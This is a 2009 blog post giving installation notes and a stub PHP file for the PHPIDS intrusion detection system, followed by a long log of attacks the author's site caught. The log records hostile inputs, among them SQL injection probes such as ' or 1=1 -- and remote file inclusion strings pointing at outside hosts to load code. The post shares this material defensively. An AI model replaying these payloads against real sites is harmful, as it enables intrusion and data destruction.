Help Irongeek.com pay for
bandwidth and research equipment:

Web Hosting By:


Sponsored by:

Google
Affiliates:
















Irongeek's Featured Links:

Web Hosting

Web Hosting

Free Web Hosting hosting

Keylogger

Document Scanning

Free Domain Names

Notebooks

Recover Data

Free Antivirus

hosted exchange 2007

EC-Council ECSA Training Videos

Photoluminescent Exit Signs







































Web Hosting:
Help Irongeek.com pay for bandwidth and research equipment:

 

AddThis Feed Button PHPIDS Installation and Test Page

PHPIDS Installation and Test Page


        Since my page is mostly a home grown ghetto PHP CMS, I was interested in seeing what sort of attacks were being thrown against it. I found a project online Called PHPIDS, and here are my notes on installing it along with a list of recent attacks as reported by the IDS.

    1. First, download the PHPIDS from http://php-ids.org/downloads/ and extract it.

    2. I uploaded everything in the directory lib and below to my web folder.

    3. I'm a noob when it comes to MySQL, so I set up a new database in MySQL using the PHPMyAdmin front end. In the file lib\IDS\Log\Database.php you will find how the DB has to be set up. What it amounted to for me was just creating the needed table using the SQL command:

CREATE TABLE IF NOT EXISTS `intrusions` (
`id` int(11) unsigned NOT null auto_increment,
`name` varchar(128) NOT null,
`value` text NOT null,
`page` varchar(255) NOT null,
`ip` varchar(15) NOT null,
`impact` int(11) unsigned NOT null,
`origin` varchar(15) NOT null,
`created` datetime NOT null,
PRIMARY KEY (`id`)
) ENGINE=MyISAM ;


    4. By default, the Config.ini file is in \lib\IDS\Config. This is where you need to set up your database name, password, email address etc. Obviously, you don't want to leave this someplace where folks can just download it, in my case I moved it one folder up from the web root where thePHP install could still get to it (see note about paths in the next section) but a web browser hopefully can not. I also set mine to ignore some Google cookies by adding this to the Config.ini:

exceptions[] = __utmz
exceptions[] = __utmc
exceptions[] = COOKIE.__utmz
exceptions[] = COOKIE.__utmc
exceptions[] = REQUEST.__utmz
exceptions[] = REQUEST.__utmc


    5. I then created the following stub file (idsstub.php) to initiate the IDS:

<?php //Set where the relative IDS directory is (IDS parent folder), no leading or trailing slashes. Change this PATH.
$IDSLoc= "lib";
set_include_path(
get_include_path()
.
PATH_SEPARATOR
. $IDSLoc . '/'
);
/*
if (!session_id()) {
session_start();
}
*/
//Make sure the line below is set to the right path. Change this PATH.
require_once $IDSLoc . '/IDS/Init.php';
try {
$request = array(
'REQUEST' => $_REQUEST,
'GET' => $_GET,
'POST' => $_POST,
'COOKIE' => $_COOKIE,
'SERVER' => $_SERVER["HTTP_HOST"],
//Uncomment the next line if you want to check the user agent, but you may get a lot of false positives
//'USERAGENT' => $_SERVER["HTTP_USER_AGENT"],
'ACCEPT' => $_SERVER["HTTP_ACCEPT "]

);
//By default, the config is in an insecure place where it can be downloaded, I moved it one directory up from my root web folder. Change this PATH.
$init = IDS_Init::init('/home/.giga/irongeek/Config.ini');
$init->config['General']['base_path'] = dirname(__FILE__) . '/' . $IDSLoc . '/IDS/';
$init->config['General']['use_base_path'] = true;
$init->config['Caching']['caching'] = 'none';
$ids = new IDS_Monitor($request, $init);
$result = $ids->run();
if (!$result->isEmpty()) {
//echo $result
?>
<div style="position:fixed; right:180px; bottom:10px; overflow:visible;" id="clippy">
<table valign="top" width="130" height="309" border="0" background="http://www.irongeek.com/images/clippy.png" cellpadding="10">
<tr><td
valign="top"><font size="1">
&nbsp;Hello, according to <a href="http://php-ids.org/">PHPIDS</a> it looks like you are trying to pwn my site.
Would you like
<a href="http://www.irongeek.com/i.php?page=videos/owasp-top-5-louisville">some help with that?</a>
</font></td></tr>
</table> </div>
<?
require_once 'IDS/Log/File.php';
require_once 'IDS/Log/Composite.php';
$compositeLog = new IDS_Log_Composite();
$compositeLog->addLogger(IDS_Log_File::getInstance($init));
require_once 'IDS/Log/Email.php';
require_once 'IDS/Log/Database.php';
$compositeLog->addLogger(
IDS_Log_Email::getInstance($init),
IDS_Log_Database::getInstance($init)
);

$compositeLog->execute($result);
} else {
echo 'Alls good, in the hood.';
}
}
catch (Exception $e) {
printf(
'An error occured: %s',
$e->getMessage()
);
}
?>


    Things you will want to note: There are several places where you will need to change your path so it knows where the files are. I've noted them in the code above with the comment "Change this PATH." Setting the right paths is the biggest pain, and sorry, but I can't help you on your personal install. Also, make sure you point the config file to wherever you put Config.ini . I've also changed some of the user submitted data that the IDS checks. Folks can possibly slip in attacks via the HTTP ACCEPT for USER AGENT header fields. I had to comment out my user agent check as it caused too many false positive. On mine, I set it to pop up an image like the following if folks try to attack my site:



It's fun to be a wiseass to attackers. All hail Clippy!!!

    6. On every page I wanted to track attacks, I added the following line of PHP:
include ("idsstub.php");
In my case, I just put it in my footer.

    7. That's pretty much it. Check out my log below of the last 2000 detected attacks, mostly it's folks trying RFI (remote file includes):

ID:59577
Name:REQUEST.alpha
Value:153208ccf96d0000b4d6f74a9e0f0b0042f70000, de.gameduell.mediaserver=http://us-m1.gameduell.com, de.gameduell.flashserver=http://us-m1.gameduell.com, de.gameduell.avatarserver=http://m3.gameduell.de, WBWTID=38.105.109.12-4AF8211A27C0000031A7557-thetimetravelerswifemovie-r16s02, CFMAGIC=7836657:41543110, CFGLOBALS=urltoken=CFID#=28802786&CFTOKEN#=61047384#lastvisit={ts '2009-11-09 07:29:35'}#timecreated={ts '2009-11-09 07:29:35'}#hitcount=2#cftoken=61047384#cfid=28802786#, SITESERVER=GUID=79427B8D6A4C4D20A56A6F14F2D3DFF1, CFID=16911270, CFTOKEN=61891113, AwarenessNETSessionId=zafnyjbjv4tmdu550fy4ggys
Page:/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10)
IP:38.105.109.12
Impact:70
Created:2009-11-09 09:37:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:59578
Name:COOKIE.alpha
Value:153208ccf96d0000b4d6f74a9e0f0b0042f70000, de.gameduell.mediaserver=http://us-m1.gameduell.com, de.gameduell.flashserver=http://us-m1.gameduell.com, de.gameduell.avatarserver=http://m3.gameduell.de, WBWTID=38.105.109.12-4AF8211A27C0000031A7557-thetimetravelerswifemovie-r16s02, CFMAGIC=7836657:41543110, CFGLOBALS=urltoken=CFID#=28802786&CFTOKEN#=61047384#lastvisit={ts '2009-11-09 07:29:35'}#timecreated={ts '2009-11-09 07:29:35'}#hitcount=2#cftoken=61047384#cfid=28802786#, SITESERVER=GUID=79427B8D6A4C4D20A56A6F14F2D3DFF1, CFID=16911270, CFTOKEN=61891113, AwarenessNETSessionId=zafnyjbjv4tmdu550fy4ggys
Page:/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10)
IP:38.105.109.12
Impact:70
Created:2009-11-09 09:37:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:59575
Name:REQUEST.page
Value:' or 1=1 --
Page:/i.php?page=%27%20or%201=1%20--
IP:208.202.136.2
Impact:44
Created:2009-11-09 08:23:01
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:59576
Name:GET.page
Value:' or 1=1 --
Page:/i.php?page=%27%20or%201=1%20--
IP:208.202.136.2
Impact:44
Created:2009-11-09 08:23:01
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:59573
Name:REQUEST.page
Value:' or 1=1 --
Page:/i.php?page=%27%20or%201=1%20--
IP:208.202.136.2
Impact:44
Created:2009-11-09 08:14:22
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:59574
Name:GET.page
Value:' or 1=1 --
Page:/i.php?page=%27%20or%201=1%20--
IP:208.202.136.2
Impact:44
Created:2009-11-09 08:14:22
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:59569
Name:REQUEST.bcsi-ac-CD2BF508A254B334
Value:19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
Page:/?bcsi-ac-CD2BF508A254B334=19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
IP:170.167.4.200
Impact:38
Created:2009-11-09 07:02:39
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.36

ID:59570
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:19FF0D9000000005mCiD33igiFu1airzcF4s 91d8r8UAAAABQAAAJD8EQCAcAAAAAAAAPBZAAA=
Page:/?bcsi-ac-CD2BF508A254B334=19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
IP:170.167.4.200
Impact:38
Created:2009-11-09 07:02:39
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:59571
Name:GET.bcsi-ac-CD2BF508A254B334
Value:19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
Page:/?bcsi-ac-CD2BF508A254B334=19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
IP:170.167.4.200
Impact:38
Created:2009-11-09 07:02:39
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.36

ID:59572
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:19FF0D9000000005mCiD33igiFu1airzcF4s 91d8r8UAAAABQAAAJD8EQCAcAAAAAAAAPBZAAA=
Page:/?bcsi-ac-CD2BF508A254B334=19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
IP:170.167.4.200
Impact:38
Created:2009-11-09 07:02:39
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:59567
Name:REQUEST.bcsi-ac-CD2BF508A254B334
Value:19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
Page:/?bcsi-ac-CD2BF508A254B334=19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
IP:170.167.4.200
Impact:14
Created:2009-11-09 06:58:42
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.36

ID:59568
Name:GET.bcsi-ac-CD2BF508A254B334
Value:19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
Page:/?bcsi-ac-CD2BF508A254B334=19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
IP:170.167.4.200
Impact:14
Created:2009-11-09 06:58:42
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.36

ID:59565
Name:REQUEST.page
Value:"
Page:/i.php?page=%22
IP:67.195.111.47
Impact:12
Created:2009-11-09 02:28:48
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:59566
Name:GET.page
Value:"
Page:/i.php?page=%22
IP:67.195.111.47
Impact:12
Created:2009-11-09 02:28:48
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:59563
Name:REQUEST.page
Value:;drop tables;
Page:/i.php?page=;drop%20tables;
IP:67.195.111.47
Impact:12
Created:2009-11-09 01:15:43
Details:
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:59564
Name:GET.page
Value:;drop tables;
Page:/i.php?page=;drop%20tables;
IP:67.195.111.47
Impact:12
Created:2009-11-09 01:15:43
Details:
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:59561
Name:REQUEST.page
Value:reviews/modernbill/samples/news.php?DIR=http://www.medisite.fr/id????
Page:/i.php?page=reviews/modernbill/samples/news.php?DIR=http://www.medisite.fr/id????
IP:86.65.110.157
Impact:20
Created:2009-11-09 01:07:43
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59562
Name:GET.page
Value:reviews/modernbill/samples/news.php?DIR=http://www.medisite.fr/id????
Page:/i.php?page=reviews/modernbill/samples/news.php?DIR=http://www.medisite.fr/id????
IP:86.65.110.157
Impact:20
Created:2009-11-09 01:07:43
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59557
Name:REQUEST.path
Value:/search, PREF=ID=e4b937d9bc71f1f0:TM=1257757337:LM=1257757337:S=qcOWQLsb3nlHDJ69
Page:/i.php?page=videos/recovercookies
IP:152.3.138.5
Impact:30
Created:2009-11-09 01:03:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59558
Name:REQUEST.domain
Value:.google.co.uk, NID=28=Xn_4yV7-6M6VzEt4WwiOGYZvCj0Gp2x_U761RPm2r_sacWBhLtYdqrxh5EN0b-qHmc8E2rpL04FqZCF9N_nmJTjsIi5iW5q6VSdTfWtlgE-yqJRbaPYkJUTzap09KNrU
Page:/i.php?page=videos/recovercookies
IP:152.3.138.5
Impact:30
Created:2009-11-09 01:03:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59559
Name:COOKIE.path
Value:/search, PREF=ID=e4b937d9bc71f1f0:TM=1257757337:LM=1257757337:S=qcOWQLsb3nlHDJ69
Page:/i.php?page=videos/recovercookies
IP:152.3.138.5
Impact:30
Created:2009-11-09 01:03:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59560
Name:COOKIE.domain
Value:.google.co.uk, NID=28=Xn_4yV7-6M6VzEt4WwiOGYZvCj0Gp2x_U761RPm2r_sacWBhLtYdqrxh5EN0b-qHmc8E2rpL04FqZCF9N_nmJTjsIi5iW5q6VSdTfWtlgE-yqJRbaPYkJUTzap09KNrU
Page:/i.php?page=videos/recovercookies
IP:152.3.138.5
Impact:30
Created:2009-11-09 01:03:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59555
Name:REQUEST.page
Value:security/?sourcedir=http://gminamakow.info//dmdocuments/mambo??
Page:/i.php?page=security/?sourcedir=http://gminamakow.info//dmdocuments/mambo??
IP:87.139.66.104
Impact:20
Created:2009-11-08 23:45:20
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59556
Name:GET.page
Value:security/?sourcedir=http://gminamakow.info//dmdocuments/mambo??
Page:/i.php?page=security/?sourcedir=http://gminamakow.info//dmdocuments/mambo??
IP:87.139.66.104
Impact:20
Created:2009-11-08 23:45:20
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59553
Name:REQUEST.page
Value:videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
Page:/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML%5cShell%5cOpen%5cCommand
IP:174.36.36.42
Impact:6
Created:2009-11-08 20:51:02
Details:
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:59554
Name:GET.page
Value:videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
Page:/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML%5cShell%5cOpen%5cCommand
IP:174.36.36.42
Impact:6
Created:2009-11-08 20:51:02
Details:
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:59551
Name:REQUEST.page
Value:videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
Page:/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML%5CShell%5COpen%5CCommand
IP:66.249.68.136
Impact:6
Created:2009-11-08 20:50:58
Details:
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:59552
Name:GET.page
Value:videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
Page:/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML%5CShell%5COpen%5CCommand
IP:66.249.68.136
Impact:6
Created:2009-11-08 20:50:58
Details:
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:59549
Name:REQUEST.page
Value:videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
Page:/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
IP:189.188.183.217
Impact:6
Created:2009-11-08 20:50:48
Details:
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:59550
Name:GET.page
Value:videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
Page:/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
IP:189.188.183.217
Impact:6
Created:2009-11-08 20:50:48
Details:
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:59547
Name:REQUEST.page
Value:-oldnews or der by 10--
Page:/i.php?page=-oldnews+or+der+by+10--
IP:67.195.111.47
Impact:6
Created:2009-11-08 19:39:43
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59548
Name:GET.page
Value:-oldnews or der by 10--
Page:/i.php?page=-oldnews+or+der+by+10--
IP:67.195.111.47
Impact:6
Created:2009-11-08 19:39:43
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59545
Name:REQUEST.page
Value:security//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo??
Page:/i.php?page=security//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo??
IP:87.139.66.104
Impact:20
Created:2009-11-08 18:24:55
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59546
Name:GET.page
Value:security//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo??
Page:/i.php?page=security//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo??
IP:87.139.66.104
Impact:20
Created:2009-11-08 18:24:55
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59543
Name:REQUEST.page
Value:security/change<font style=
Page:/i.php?page=security/change%3Cfont%20style=
IP:211.197.11.15
Impact:8
Created:2009-11-08 17:52:25
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:59544
Name:GET.page
Value:security/change<font style=
Page:/i.php?page=security/change%3Cfont%20style=
IP:211.197.11.15
Impact:8
Created:2009-11-08 17:52:25
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:59539
Name:REQUEST.page
Value:security///?_zb_path=http://www.hackengine.net/scan/id1?
Page:/i.php?page=security///?_zb_path=http://www.hackengine.net/scan/id1?
IP:81.176.229.7
Impact:26
Created:2009-11-08 12:40:27
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59540
Name:GET.page
Value:security///?_zb_path=http://www.hackengine.net/scan/id1?
Page:/i.php?page=security///?_zb_path=http://www.hackengine.net/scan/id1?
IP:81.176.229.7
Impact:26
Created:2009-11-08 12:40:27
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59541
Name:REQUEST.page
Value:security/phpids-install-notes///?_zb_path=http://www.hackengine.net/scan/id1?
Page:/i.php?page=security/phpids-install-notes///?_zb_path=http://www.hackengine.net/scan/id1?
IP:81.176.229.7
Impact:26
Created:2009-11-08 12:40:27
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59542
Name:GET.page
Value:security/phpids-install-notes///?_zb_path=http://www.hackengine.net/scan/id1?
Page:/i.php?page=security/phpids-install-notes///?_zb_path=http://www.hackengine.net/scan/id1?
IP:81.176.229.7
Impact:26
Created:2009-11-08 12:40:27
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59537
Name:REQUEST.page
Value:backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:/i.php?page=backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:121.124.127.164
Impact:20
Created:2009-11-08 12:20:38
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59538
Name:GET.page
Value:backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:/i.php?page=backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:121.124.127.164
Impact:20
Created:2009-11-08 12:20:38
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59535
Name:REQUEST.page
Value:backtrack-3-man/scrollkeeper-config //rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:/i.php?page=backtrack-3-man/scrollkeeper-config%20%20//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:121.124.127.164
Impact:40
Created:2009-11-08 12:20:37
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:59536
Name:GET.page
Value:backtrack-3-man/scrollkeeper-config //rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:/i.php?page=backtrack-3-man/scrollkeeper-config%20%20//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:121.124.127.164
Impact:40
Created:2009-11-08 12:20:37
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:59533
Name:REQUEST.page
Value:backtrack-3-man/scrollkeeper-config //rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:/i.php?page=backtrack-3-man/scrollkeeper-config%20%20//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:121.124.127.164
Impact:40
Created:2009-11-08 12:20:15
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:59534
Name:GET.page
Value:backtrack-3-man/scrollkeeper-config //rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:/i.php?page=backtrack-3-man/scrollkeeper-config%20%20//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:121.124.127.164
Impact:40
Created:2009-11-08 12:20:15
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:59531
Name:REQUEST.page
Value:backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:/i.php?page=backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:121.124.127.164
Impact:20
Created:2009-11-08 12:20:14
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59532
Name:GET.page
Value:backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:/i.php?page=backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:121.124.127.164
Impact:20
Created:2009-11-08 12:20:14
Details:
